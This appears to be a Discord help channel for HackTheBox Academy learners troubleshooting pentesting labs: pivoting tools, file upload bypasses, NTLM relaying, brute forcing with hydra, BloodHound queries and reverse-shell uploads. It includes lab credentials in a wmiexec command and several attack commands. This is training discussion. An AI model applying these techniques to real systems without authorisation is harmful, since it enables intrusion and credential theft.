Just ask your question here on Discord and someone, maybe even from the staff, will hopefully be able to help you
I'm doing question 1 of the DACL II skills assessment. I have set up chisel just like the solution pointed out, but when I run finddelegation it's just timing out.
Hello, I'm pretty new to pentesting and did the Web Requests module, but I got stuck at CRUD API. There is one exercise, but I don't seem to understand it. It's this one: "Exercise: Try adding a new city through the browser devtools, by using one of the Fetch POST requests you used in the previous section."
I have a question regarding the Skills Assessment - File Upload Attacks module. I got the ||upload.php|| file, in which the file gets ||renamed before storing|| with this style: ||ymd||, which should mean ||250330||, right?
The complete filename would be: ||250330_name||, but I can't get that file.
But I can't find the file under the upload directory ||user_feedback_submissions||.
I just used ligolo, so if you are familiar with it, might be a good alternative to whatever the provided solution is using.
In the Live Engagement for host one, has anyone tried the 2nd upload vulnerability suggested in the hints?
sorry to ask maybe I'm not that updated but how do I access doxbin?
What? This channel is for discussion about the Academy platform on HackTheBox. This server isn't for illegal stuff or doxxing people.
Same issue again with this module. Can't log in even though I waited for 10 minutes instead of the 2 to 3 the module says.
which module/section and what's the error
I tried xfreerdp(3) and can't get access - Unconstrained Delegation - Computers (Kerberos Attacks). https://academy.hackthebox.com/module/25/section/142
I am going to wait for about 20 minutes this time and maybe it'll work, lol.
try removing the password from your connection command
and the -p argument entirely
then remote in and type the password into the password field
same result. I tried that last time i had this issue and it didn't work.
I might need to go to next section and double back later.
try it again but remove the prefix from the username
ok
I even tried with the local user even though it's supposed to be domain (just for kicks)
Are you using the correct port?
Good call r1cky
My bad. When I did xfreerdp -h it showed that's how you select the port.
Weird, I've never done that, man shows /p:
Still no log in
I already reboot my system and reset the vpn.
not sure that port is an argument I think it means to add the port after the colon in the /v parameter
that's what i thought too, but there is probably another way too.
I mean:
/v:<IP>:<PORT>
Yup that was the first pic above the last one i posted
Oh, my bad.
well you're getting connection reset by peer error, not wrong username/pass
under which one?
your latest pic
Ok.
I'll probably just go ahead and double back. Maybe it'll feel sorry for me and work, lol.
I just tested, works fine for me with xfreerdp3
Not so sure what I am doing wrong.
I think it's your way of thinking. Instead of rushing all the modules needed or retired machines, have fun! What if I do this? What if? If I write this in a different way, be creative, be different. How does this service work? Something interesting? Write a Python or Bash script which automates the vulnerability; if you don't know how, ask ChatGPT. Ask why about everything that you don't understand. Have fun with hacking.
sorry for the question but is there a module in HTB that teaches about the tool "ligolo"?
No
You can run it either way.
Unfortunately no, ~~should really be taught in pivoting imo~~
Please don't post flat out solutions like that.
Sick of saying it
..so I will get AI to code a solution-warning bot
lol
I've heard from everyone that it makes pivoting really easy and everyone is using it in both OSCP and CPTS.
Really hope they will teach it soon since I learn the most from HTB.
I tried it and still not working.
It does, but I don't think it warrants its own module, it's just that easy, also it's still better to learn other pivoting techniques through ssh, chisel, metasploit, etc. as they provide deeper level of knowledge than just, establish tunnel go brrr
I'd advise Googling the error codes you are receiving, there's a very particular reason why it is failing
This will be my 5th reset. I will reset and wait for about 15 minutes while reading through the next section
I guess it would be wonderful if its a section in pivoting module
If you are referring to what I posted, I didn't mean to spoil anything and figured since that is what the section provides you to login, i.e. similar to SSH into the target with htb-student... I didn't think there was any harm. Regardless I will ensure to go to DMs.
Thank you.
If it's over Tier 0, pasting module content, whether part of the solution or sections, it's best to err on the side of caution and go to DM
It does have really good documentation though... https://docs.ligolo.ng/
for more information on pivoting the pivoting module is pretty good (so far... am still going through it)
You can DM if you'd like and I can look at some other things on your end.
On the Footprinting module medium lab, I have RDPed in and found the important file, but I don't see how I can use it. I have tried to use it for the DB and it's not correct, and I can't even enter the @ sign in a "run as administrator" field.
Have you tried authenticating as the other user on the machine?
I have tried to RDP with that login.
Back to modules?
Back to ignoring my professors
Not RDP in particular, just access the file.
Guys who did the CBBH, I'm in the Burp Intruder section and my Burp has been running for too long. How do I solve this?
- 2 Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag.
you mean the sql server?
I literally added the fuzzing points after the /admin and the brute force is working well; it's just that it's not catching anything and it's been like this for a while.
It just caught a blank page of index.html.
The password doesn't work for the SQL server though.
Maybe I'm just missing something obvious.
hello there,
Is there anyone (in the administration or others) who could check my report/documentation of my pentest assignment? I want to learn how to write documentation but I don't know who I can ask to check if it's correct or if it's missing some important aspects.
oh I just found the Documentation and Reporting module...
Imo it should be at the beginning of the CPTS path not at the end so ppl can already write more "professional" reports.
alright i got it
I can't type @ for some reason in that admin menu.
I found out that using a virtual keyboard was the solution by looking through the comments here in Discord.
yeah, you'll write a beautifully formatted report
full of nothing
Jesus that's funny
thank you
Wouldn't you love to see beautifully formatted nmap output?
I used FFUF or gobuster it worked way faster
since burp without the subscription is really slow thought it would be better to use something else
What's the difference between the Introduction to Networking Course and Network Foundations?
Network Foundations goes deeper
I'm on the first question of the Web Proxies skills assessment and it's asking me to enable a button on the webpage /lucky.php.
I found the line that disables it, but it's only in the response, not the request. How can I modify this?
I believe that module goes over how to capture responses in Burp too
caido 
Is anyone working on the Academy labs and can't connect to their target host? I'm having trouble with RDP and it appears unusual.
i captured it
But the line is in the response,
so I can't send the edited line back to the server.
How do I go about this?
where can you send it to?
Try the TCP vpn it works beautifully with RDP
i can only send requests
Beautifully slow 
If UDP then yes lol
But TCP saved my life
It used to take an hour on each section of Active Directory Enumeration & Attacks because of RDP with the UDP VPN, but when I switched it took way less time to finish the exercises.
Yeah... I'd probably just setup a pivot then work off the attacker machine
any ideas ?
You've captured the response?
The modules are down
yes
I've been ok RDPing into these labs but they have now failed.
There's a string that says "disabled". I'm able to delete it, but that won't go back to the server.
https://status.hackthebox.com/
they look up to me
Welcome to the HTB Status Page
Module/143/section/1420
Do you need it to go back to the server?
Rdp
Q: I'm in the infosec module setup; it's been talking about downloading and installing a Linux VM.
Can't RDP, I've been fine before.
Well, whenever I hit the button it adds the disabled string back, so I thought so.
get anything on burp after clicking it?
I'd submit a ticket but all they will do is ask if it's down instead of diving deep into anything.
Yes, I get the request.
I sent it to Repeater to see what the response will say, but it is still disabled,
as well as when I forward it.
Q: is it possible to run SELinux on Parrot OS eventually? If I have admin right and download the packages?
it's not feasible
Has anyone here done the Web Proxies module yet?
If you can't delete it, think about what else you may be able to do to get it working.
Hi everyone, I'm starting the CCNA course. Can you tell me the topics I should know very well to be professional?
Huh?
This is for HTB related discussions etc, but regardless you're not going to be given tutoring to pass CCNA, you should be doing that learning part yourself as part of the process.
Ok thx
So I am working on file upload attacks and in the non-blacklisted extensions section it tells you to use a certain extension, which in the lesson it works but when you try yourself it does not. I can try other extensions I am just confused why in the section it continues on as if it worked I guess
the sections are not generally a 1:1 guide on the challenges at the end
you're supposed to apply what you've learned to the challenge
Thank you for confirming that, I had a feeling and just wanted to be sure hunting for the answer myself is expected
Need a hint regarding the Footprinting Lab - Medium; I discovered a user and passwd for SMTP but I don't know what I can do next...
Because there's no SMTP service on the target system and I don't have access to the SMTP machine.
Im currently studying for the CPTS
In the file transfer modules I don't feel like I fully grasped the concept (I was able to move files but needed more umph, I guess) and need additional resources.
Are there any boxes you can recommend that deal with file transfers and maybe requiring some base64 encoding to do so?
Have you tried using the credentials for other services?
I just found smth, gotta test it; BRB
Found RDP, but ughhh, now I need creds to log in to SQL...
Is it really a medium lab? Not hard? haha
Curious why the hint for flag 1 of the Using CME skills assessment is so misleading. Asking you to enumerate a null session that doesn't exist.
Output:
```
$ nxc smb 10.129.204.182 -u "" -p ""
SMB 10.129.204.182 445 SQL01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:SQL01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 10.129.204.182 445 SQL01 [-] INLANEFREIGHT.LOCAL\: STATUS_ACCESS_DENIED
```
Yet the hint says to review the Enumerating Null Sessions section. So what null session is that hint talking about?
@waxen totem sorry, but I need help... I found the creds for the database (creds are 1000% correct) but I get an error "login failed for user sa".
@sleek urchin
using the same creds over 20 times I finally get different output:
"A connection was successfully established with the server, but then an error occurred during the login process. -> No process is on the other end of the pipe"
Tried using both smbclient and rpcclient to debug this, also to no avail. Anyone?
Again, CME Skills Assessment here.
ngl imma rage here soon
Taking this to #1234357888114364508 because still nothing.
Nah, you GOTTA be kidding me; the problem was I didn't run the app as admin hahah
[Solved]
Hello everyone,
I'm currently working through the Windows Privilege Escalation module and encountered a possible issue in the Credential Hunting section.
In Question 2:
"Connect as the bob user and practice decrypting the credentials in the pass.xml file. Submit the contents of the flag.txt on the desktop once you are done."
I successfully connected as the bob user, decrypted the credentials, and retrieved the flag.txt file from the Desktop. However, even after submitting the correct content of flag.txt, the system still marks the answer as incorrect.
I also double-checked the result using "Show Solution", and my answer matches it exactly, yet it still gets marked wrong. It seems like this might be a bug.
Could someone assist me with this issue? I'd really appreciate any help!
Check for non-printable characters. If you're using Wayland, there's a known issue where stuff copied and pasted from RDP often includes carriage return characters because of the differences in character handling between Windows and Linux.
hi, in the Web Server Pivoting with Rpivot section of the Pivoting, Tunneling, and Port Forwarding module, i can't seem to use "proxychains firefox" against the webserver because of DNS resolution problems, but i can still cURL it, does anyone know what causes this?
So I've been hacking away at this for a bit and am finding myself stuck. I am currently on File Upload Attacks, on the section "Blacklist Filters".
I have set up Burp to grab the request for an upload, fuzzed the endpoint and found a number of extensions that upload successfully, but the test hello world script I uploaded does not return anything when I sent it to Repeater to test each one out.
I can't figure out what I am doing wrong.
You could also setup foxyproxy
I'm not too familiar with web attacks yet, isn't this the extension to set up proxies?
If so, I guess I should use it to access the webserver directly from my browser, right?
Probably, I added it to my notes just in case, but yeah, curl works just fine.
thanks
I am stumped
Never mind, figured it out. The module literally forces you to go back to the pre-Ligolo form of pivoting...
Omg, Ligolo doesn't give the exact functionalities of chisel and stuff?
I'm currently learning about pivoting and I heard pretty much everyone here praise Ligolo, so I was kinda happy knowing I would have an easy way to do all of that (but I guess not lol).
It does, but this module/section is literally designed as such that it's got Chisel preinstalled and running and you are forced to connect to it to gain an initial foothold.
The thing that makes Ligolo more efficient, at least, is that you're using tunnel devices to tunnel the connection as opposed to a user-mode proxy. Having the kernel do the tunneling for you means you don't need to proxychains anything and it's also much faster overall.
Hello, I'm working on "Active Directory Enumeration & Attacks". I have an issue with the first question: What is the default Minimum password length when a new domain is created? (One number)
I'm confused about how to solve the first question.
I mean.. did you run through the sections?
Because there's literally a section dedicated to what you asked
Yes, I did. In the section it's explained with SMB; this server doesn't run SMB, also it's a Debian server.
You're missing something in that section then
I'd advise reading back over the section.
Also... re-read the question
See the "Enumerating & Retrieving Password Policies" section. There's some very important information there about this.
Hello everyone. I am currently trying to finish the File Upload Attacks module, type filters section. I have gotten as far as avoiding all the countermeasures, and my shell is uploaded. The only issue is I can't seem to extract the flag even though I bypassed the protections including MIME. Any pointers are welcome, going to keep trying in the mean time.
Just wanted to say that Footprinting Lab - Hard was awesome; fr, had so much fun.
It was a bit hard at the beginning because I forgot about the existence of one important thing, but after that it was awesome.
Hi, I'm currently stuck in the Password Attacks module, Network Services, trying to brute force RDP. The others had no issue, but RDP with hydra doesn't seem to find anything. I've been waiting for an hour and a half.
Hi
When spraying passwords against AD
Do I need to use the CN name
Or the user principal name ?
Which module is this relating to?
Hi, can anyone help me with a problem?
module: Attacking Web Applications with Ffuf
section: Page Fuzzing
Found the flag, but when I submit it says that it is incorrect.
Try to check for spaces before/after the flag.
No spaces.
DM me the flag and I will check.
Hi, I'm currently stuck in the Password Attacks module, Network Services, trying to brute force RDP. The others had no issue, but RDP with hydra doesn't seem to find anything after completing the brute force. I used the resources given in the right way, but it still doesn't work out.
Anyone got the File Upload Attacks skills assessment and can help me? When I intercept the request, the request doesn't come from upload.php but from submit.php.
How can I get an upload request to upload.php? I only need this to solve the assessment.
I'm currently working through the File Transfer module and had a quick question. When it comes to transferring files with Python, is it better to install uploadserver on the target host to upload files, or should I use Python's built-in http.server (assuming Python is already installed) to avoid installing anything?
You'd install uploadserver on the ATTACK host so that you don't need to run a file server on the target host. Also, uploadserver works both ways, e.g. you can also download stuff from its base directory.
Thank you for the clarification !
Anyone?
have you checked the request headers in burp?
yes nothing interesting there
can you share the module link??
Make sure you intercept an upload.
OH MY GOD
THANK YOU
WHY IS THIS EVEN SO CONFUSING? I THOUGHT SUBMITTING EQUALS UPLOADING
Easy to overlook. Highly suggest always taking the time to see how it functions before testing for things.
Just viewing the source code, yeah,
making sure you don't miss anything.
ok thank you I will check that right now
How do I write a message on other channels?
In the sqlmap skills assessment I am sure the flag is 100% correct, but when I submit it says incorrect.
"Exploit the SSRF vulnerability to identify an additional endpoint. Access that endpoint to obtain the flag." In the question, I just requested the admin.php address and it gave the flag in a very ridiculous way, but the question tells us to find an additional endpoint and do a lot of processing.
Exploiting SSRF
I'm doing this one: https://academy.hackthebox.com/module/23/section/513
Skills Assessment - File Inclusion
And what I see is this access.log file is not updating?
Even when I refresh many times it shows the same.
Some rooms have been updated but the questions are old questions. How do I fix this, is there a room reset?
Can someone explain to me why we need to run Responder with ntlmrelayx? I mean, can't we just run ntlmrelayx?
Hey, I don't know if you found the answer, but I had the same issue. Actually this is not the right attack path. Just use a much simpler one and remember that the server may offer additional authentication protocols than the one used by the intercepted client
Without Responder, ntlmrelayx is just sitting there waiting for something to happen.
and you also have to consider the fact that ntlmrelayx doesn't store hashes unless a relay succeeds
whereas responder grabs those hashes anyway for cracking later, so even if relaying fails you'll walk away with something useful
Anyone having issues where you can't copy/paste on the new xfreerdp3?
Try wrapping the entire thing in single quotes. Ex: wmiexec.py 'inlanefreight.local/wley:"transporter@"@172.16.5.5' if I am understanding your question right?
check your DM
I am missing something for when you have to disable the SMB server or HTTP on Responder in order for NTLM relay to work. While I have done the module, I cannot fully comprehend that.
I have gone through all of the examples in the Python hijacking section in the Linux Privilege Escalation module and none of them work.
the sudo -l is for the particular script, not just python
There are no write privileges on the library
I can't set the PYTHONPATH to /tmp, due to only being able to run the mem script.
None of the PYTHONPATH Listings have write access.
The 3 prereqs for python library hacking are not present on any of the stuff related to mem_status.py
Ok, I figured it out, but I'm really confused. These are the perms, so why is it writable?
-rwSrwxr-x 1 root root 192 May 19 2023 mem_status.py
@lusty thicket so its like responder is feeding ntlmrelay?
responder by default takes the hashes for itself without letting them go to ntlmrelayx, meaning if responder is running with smb/http enabled it'll just grab the hashes for itself. But we don't want to just capture hashes, you want to be able to relay them onto another machine so you can use them in real time, which is why you disable smb and http
yeah responder brings in the victims and ntlmrelayx makes them hand over their hashes
we disable SMB on responder, so ntlmrelay will use port 445. aaaaaaa ok yeah I got it now. Thanks
funny thing is that I have finished the module, but still didn't comprehend this 100%, nvm thanks
hey guys I'm still working on "What is the default Minimum password length when a new domain is created? (One number)" from Enumerating & Retrieving Password Policies
but I can't find the default Minimum password length when a new domain is created
Reread that section as it is provided in it.
unbelievable, I was looking inside ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
that was inside the content information
need some assistance on Unconstrained delegation - Users (Kerberos Attacks)
You can DM
hello guys, I'm on the active directory module, I'm stuck on that question on the privileged access page, can you help me please? What other user in the domain has CanPSRemote rights to a host?
I find nothing...
what do you get when you run the cypher query
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
let me test, I'll tell you
omggg it works!!! thank you so much bro.. but how can I know how to build this query?
You're welcome!
It's a long ass explanation, it's basically a relationship query between 2 entities (a user and a computer) and the relationship is who can psremote, so it puts the result in a variable p1 for users and puts the results for users in p2 and checks who can access what and finally returns p2 as the output in the graph, there are other variables that represent entities/AD objects
Just pass it to ChatGPT for a better explanation, it's quite interesting. (this is from the module btw)
I can help if you don't mind, you can kindly inbox me, I can be of help
You have a colon included in the name for "inlanefreight.local/wley:" remove that because it's recognizing that as a character that's part of the name
lol that's my point exactly wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5 look at it and compare, you have a colon included in the username in quotes
Alright thank you so much !
No, you tried multiple commands, and in the ones I noticed the quotes weren't even, I'm just gonna grab glasses now lmao
course material is very correct lol I've done that module over 3x
wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5 try this and if it fails just revert and try again, should work.
if it fails again exclude the password from your command and input it when it prompts for the password
Oh my god there is just too much content. How is it expected to be kept in mind.....
gotta take good notes and organize them
Notes + constant practice
Yes, I did forget the practice.
Ippsec would call it "Perfect practice"
I had to take physical notes for that one and read it 2x a day
same, i am taking physical notes
as well as on Notion, but god damn...I need to put some of the content down or it will be too much for tiny brain to re-read from notes.
@faint hill your screenshot contains spoilers [password], please redact and re-ask
The password is in the course material as is the UN
It's still a module above tier 0
Not to mention cracking that pw is part of an earlier section from what I recall
It's part of the module that's above tier 0. Ergo spoiler by default
Instead of arguing with that, just redact the pw and re-ask your question
See channel description
I have a problem on the CPTS path on HTB Academy, can I ask here?
Literally only one minor issue with your post, that's all
ok, I can't upload shell.php on the web server (it worked for me before, I just took a rest and came back and now it's not working), module Getting Started, Nibbles - Initial Foothold
I think it's a problem on the machine box, I restarted it but it still doesn't work https://academy.hackthebox.com/module/77/section/852
Did you upload it on the image uploader thing?
can't upload
This isn't helpful without error messages or issues when you try and reach the shell.php page
i upload it on nibbleblog - Plugins :: My image , http://<machine-ip>/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
Did you adjust the payload to call back to your ip when you visit it?
Your ip being your tun0 ip
yes, before it was working and I uploaded multiple shells. but now when I try to upload it keeps loading for 10 mins without any response message
? Did you visit where it was uploaded to?
The shell won't do anything until you visit it
let me try
yes I tried and I get 404 not found http://<machine-ip>/nibbleblog/content/private/plugins/my_image/image.php
Remove the /image.php and see what files are there
If you uploaded shell.php -> the file may be named shell.php
http://10.129.73.77/nibbleblog/content/private/plugins/my_image/
find only db.xml
Then it didn't upload for whatever reason
yes it's not uploaded, it keeps loading..... and no response
keep loading
That's not always a bad thing
But I suggest changing vpn regions
lol let me try my old crazy solution, I think I will shut down my laptop and try again
When a reverse shell is run, it will continue trying to load the page
ok
So that's not necessarily an indication of error, the page will load when you kill the shell
Hey Marcie, perhaps that part of the module needs a little heads up in case anyone tries this in the future again, or perhaps this message should be in the erratum, I dunno. - That user isn't an admin user in the domain hence he can't wmiexec or psexec onto the DC since he can't write to any admin shares; the module unit shows that it works which is why he was confused. I noticed this question has been asked a couple times here.
I also get the same error on my end trying.
I dislike how much the module overall just shows creds you had to uncover earlier on instead of relying on good notekeeping
I wasn't so much arguing with the error, just that it contains a password tbh. It's a valid issue that can be addressed
Unless I'm hallucinating and you didn't have to discover wley password in an earlier section
You did, LLMNR/NBTNS poisoning section.
Yeah I get that.
lol
It is one of those things I've always felt meh about because you can skip ahead find the info and not put in half the work
yup, I see you're a mod now, well done!
is this for nibblesblog
can I send a video here?
For the 1 on 1 help, do I just ask a question & hope it gets answered?
Thank you
I'd first search the channel as you may see it's been asked before and that might be all you need to get going again.
Yooo guys, does anyone know why I get two different password hashes when dumping them from the SAM and SYSTEM files using secretsdump.py versus samdump2?
if I use spoiler tags is that enough to avoid spoiling or do I need to word my question to avoid details entirely? Been working a few days on the type filters section of File upload attacks.
Anyone can unmask a spoiler tag.
I know. That's why I am asking: Am I attempting to avoid people getting information they have not paid for or information they don't want spoiled?
So yeah, it doesn't do anything and it would still be considered spoiling.
Okay that helps
You can DM what you are trying. I'm afk but still might be able to assist.
mind if I DM you?
Yeah that's fine.
Thank you. I'll try to be as concise as possible.
I'm trying with Pwnbox and I could upload the img, after multiple uploads I got blocked lol idk why, I tried to change the VPN, still blocked..
got a small question
why does this not work all the time:
hydra -L username-anarchy -P passwords.txt ftp://127.0.0.1 -t 48
but medusa does:
medusa -M ftp -h 192.168.15.138 -u username-anarchy/ -P passwords.txt
is it because of the / or what?
I don't think hydra supports ftp:// in the target field
it does
both variants are possible
will try in a bit but shouldn't matter
I will try with other boxes
how come I can't install sqsh on the Pwnbox nor on my own native ParrotOS?
how is a tool used in a module not accessible to the student?
isn't it already installed?
no it is not
I don't use parrot and it works fine for me
I had to install it on my kali
I got it to work with mssqlclient.py as an alternate tool
Sqsh isn't in parrot repos. Simple as
Download libreadline7_7.0-5_amd64.deb
http://ftp.de.debian.org/debian/pool/main/r/readline/libreadline7_7.0-5_amd64.deb
Download sqsh_2.5.16.1-2_amd64.deb
http://ftp.ch.debian.org/debian/pool/main/s/sqsh/sqsh_2.5.16.1-2_amd64.deb
First install libreadline7 by double-clicking on the file.
Then install sqsh with a double-click.
I had the same problem once...
Perhaps there are newer versions today
Hello, for Linux Privesc module Cron Job Abuse, it shows how to find the file to modify by searching for files with permissions, but where is the cronjob or scheduled task that is causing this to run every 2 minutes? I cannot seem to find anything
I'm needing help with an HTB question
for the Linux Fundamentals course on HTB
this is the question How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
these were the commands I used
netstat -tuln | grep -v '127.0.0.1'
ss -tuln | grep -v '127.0.0.1'
Read the question again...:
How many services are **LISTENING **on the target system on all interfaces? (Not on localhost and IPv4 only)
(127.x.x.x is also a loopback address, not just 127.0.0.1)
okay I believe I understand now. From the information I provided I counted 14, which I believe is right, again with the information I provided, but the answer was incorrect. I'm thinking I may be using the wrong command possibly
and not getting the full list of listening services?
I'm still learning
well the question asks for several things
ipv4 only => (netstat actually has a specific flag for this, 4)
NOT localhost => localhost is anything on 127.x.x.x
yes yes okay, I did not know that it had a specific flag "4"
and for the second thing I did exclude 127.x.x.x and IPv6 addresses, which left me with 14 services, that's without localhost and IPv4 only
no you actually only excluded 127.0.0.1
but in your screenshot 127.0.0.53 is still in there
that number will drastically reduce the amount
I can count it in the screenshot even
the IPs that are :: and ::: are IPv6 addresses
<3
What I did was use 2 commands and I was counting the addresses twice!!!!!
so it was 7
@fathom pendant those two commands, I used both
and counted both twice, thank you for your help
the important thing to note: the udp ones: those don't say LISTEN next to them
NOTED!
so I did more messing around
netstat -tln | grep -v tcp6 | grep -v 127.
I swear my brain just clicked
or netstat -tln4 | grep -v 127.
:)
oooooooooooooooooooooooo
this is why I love learning
can anybody suggest how to complete the advanced file disclosure section of the web attacks module? I have tried the CDATA method and the error method as given in the section but could not get the flag
Thank you to the person/team who uploaded the android security module
Can we have in depth module for the same - writing exploits for android apps/iOS apps or low level android vulnerabilities/iOS security apps module
Would be great to have it
Or low level android kernel bugs (vr)
did anybody solve the question of cbbh web attacks module advanced file disclosure section? Use either method from this section to read the flag at '/flag.php'. (You may use the CDATA method at '/index.php', or the error-based method at '/error').
Hello there, can anyone help me with a nooby question?
I am currently working on the SQL injection module -> Database Enumeration.
And for some reasons, I can't wrap my head around what the difference between a "schemata" and a "database" should be...
Already tried that, but it's still not intuitive for me. I guess I just spin up a database with docker and try to get some intuition by using it
You familiar with OOP? Think of schemas as classes for the tables in a database wherein the table is the actual object and the schema is the template to that object
database is like a box and schemata is like a compartment inside the box
For Exploiting SSTI - Jinja2: Exploit the SSTI vulnerability to obtain RCE and read the flag.
I am able to cat flag but it says it is still the wrong answer. Am I missing anything?
Aaaaaaah!!!!! Yes, that makes a lot of sense. But just for my understanding:
Situation:
- I check with SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA for Schematas.
- I find schematas (NOT DATABASES) such as "dev" and "ilfreight"
Implication -> Based on the Schemata I know that there will be some databases with the structure defined in "dev" or "ilfreight".
Question:
Assuming it's similar like OOP and the "dev" would be the class. Would this mean, that it's not required for the actual database to be named "dev"?
For example "dev" as schemata, but "dev_1", "dev_2" and "dev_3" could be the actual databases (such as instances of a class in oop)?
No clue
I'm not a database expert, it's common practice to just name it the same but not sure if it's required or not
Hahahh, so in that case I will not make it more complicated than it needs to be. I see schemata dev -> I assume database dev
Thank you very much for the help! highly appreciated
did anybody solve the question of cbbh web attacks module advanced file disclosure section? Use either method from this section to read the flag at '/flag.php'. (You may use the CDATA method at '/index.php', or the error-based method at '/error').
dm me everything you got
https://academy.hackthebox.com/module/136/section/1288
I fuzzed the extensions and I got some working ones, I uploaded a web shell, but when I go to the page it shows the payload and doesn't run it
the server is not configured to execute .php4 files as php files. So it shows the contents as if it was a .txt file
you need to figure out if there is another extension that is executed as php file by the server and not blacklisted
oh ok, so is there any easy way to find it out, or do I have to check them one by one?
Probably best is to just try; if you use zaproxy or Burp Suite you can configure a list of possible php extensions and try them all automatically, and based on the server response size you can see if any of the extensions behave differently
Hello, I'm on the File Transfer module - Windows:
I tried following the instructions. First I ran the command below on my host machine:
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Then I tried to run the command below in the RDP window but it's not working, though it is accessible through Windows Firefox:
dir \\IP\DavWWWRoot
How do I get the result like in the module? Thanks
and why is it like this? in Repeater it says Extension not allowed and in Intruder it says File successfully uploaded
can you switch to the request view for the one on the right? If you compare the requests there should be a difference, maybe on the right it didn't actually replace the file extension correctly
guys I really have no idea how to submit the flag of this one https://academy.hackthebox.com/module/110/section/1053. Obviously the "last line in the request" was something like "Connection: keep-alive" in my case, but it said it should start with msf
here you go
use auxiliary/scanner/http/http_put in Metasploit on any website
make sure to use proxychains and capture the request in Burp, and when you're going to run the exploit you will see a request in Burp and the flag too
hello everyone, I'm super new to this and hope I'm posting in the right place
I'm trying to figure out how to get the URL from a target and just can't seem to do that
this is the target 83.136.249.227:34959 and I'm trying to get a result looking like something.com in order to use the curl command, thank you in advance!
like for example if I do kerberos::ptt "C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"
how do I know what kirbi to use if I would have like 10 of them?
would it matter?
use the most recent one for the targeted account
Hello, I am doing the Live engagement of the Shells & Payloads module "https://academy.hackthebox.com/module/115/section/1139", I am trying to get a shell on host 1, I've tried different brute force attempts to log in to Tomcat, but no success. I've checked the hint that is telling me the user and pass, but I would like to be able to brute force the login without knowing the hint, any hint on how to get it? a special list?
Enumerate the foothold (the target you have access to).
Hey I'm very new to this and I'm having an issue in the windows fundamentals module.
I am on File System and the question is to find out which system user has full control over c:\users. The guide is to use icacls in order to find this out but try as I might I can't get this to work in either Bash or powershell. Any help would be greatly appreciated.
Hi, I am new.
I am trying https://academy.hackthebox.com/module/54/section/488
I am fuzzing inlanefreight.com from Pwnbox but I get zero results. It's a copy paste from the "Sub-domain Fuzzing" section. What am I doing wrong?
ffuf -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com/
Have you tried different wordlists or just that one?
only that one. In the example they give they use that wordlist, and show results
I haven't done that module, but just to check you have accessed the target via whatever means the section provides correct?
There are a couple of other top1million wordlists. I'd at least try them too and if nothing then start looking at what might be wrong.
There are no targets to activate in that section
I am sorry, I don't think I get you, how would it help enumerating the host I got credentials for if I want to brute force the Tomcat of the other one?
You got access to a foothold right? That means it was compromised by some means or an assumed breach. Well, it would be worth enumerating some, nothing deep, think hiding in plain sight as there might be something on that host that can help you.
would be strange to require trying other wordlists, when there isn't much mention of it. but I will try.
Eh, this is where you have to start thinking on your own a bit. I could be wrong, as it has been a while since I did that one, but I would go through a few wordlists before I started troubleshooting.
well running ffuf -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u https://FUZZ.inlanefreight.com/ now
Hey everybody, I'm looking for a partner or a mentor to teach me Python. I'm trying to learn how to code, someone please help, got everything I need but a partner or mentor
You can DM as I doubt it worked.
I had taken a break as I was at a course for the last week and totally forgot you have to use freeRDP to follow the questions. thank you
understood, thanks!
I need to banner grab for this little exercise using netcat by making a connection to tcp port 22
could someone help me out
You sure you have to connect to port 22? cos you're given a target port
Did that section/module not cover banner grabbing? Or anything previously taught?
you're given an IP:port
[Solved...ish]
Need a sanity check on the Pivoting... module, doing RDP and SOCKS tunneling with SocksOverRDP. My second RDP session always dies a couple seconds after it spawns (for the second pivot that is)
[Solution:]
-# janky as f
Got past it by opening the flag as quickly as possible and taking a screenshot
Real solution: Check the performance tab on mstsc.exe, was mentioned in the section I'm just a goof who forgot about it
I am sure everything is in the text alright but I am Dutch and sometimes I don't fully understand
- it is all new and very technical to me so I might not understand correctly or miss something
that's kinda the issue that gets lost in translation
is that tool names and such in the text can get translated and you miss the point
I also gave the basic command, you just need to replace IP and port with the given IP and port
for future reference for people to help you; it's helpful to have the module and section name
module name being the overall thing "Getting Started; Enumeration with Nmap; Web Attacks"...
Section being like "Introduction"
check the command format again, it's:
nc <ip> <port>
NOT
nc <ip>:<port>
only the result that I got and the correct answer are different
please endure my ignorance a bit longer hahaha
I can't enumerate the AD users with PowerView or SharpHound collection - no LDAP connection?
Have you tried it using something other than evil-winrm?
no, thanks will try - but I don't think there's any alternative connection into MS01
You can DM if you'd like. Highly recommend passing creds around with netexec.
ohhh yeah - very nice
I am facing difficulty with a CTF flag that requires finding a flag on the web page in the root directory "/". How can I achieve this using the ffuf tool?
Should I use path traversal wordlists for this?
it produces different answers because the version is not the same. you get the banner of the secure shell this way
thank you
There can be same services running on the same ip with different ports
No problem
@near orchid you're not connecting to the right port
when you're given a public IP:port the ONLY scope is that IP:Port, any other port is off-limits for testing
Hey peeps, anyone with some time to help with a module? I know I am doing the correct thing, as I am on the server but can't find a particular file
Didn't want to spoil it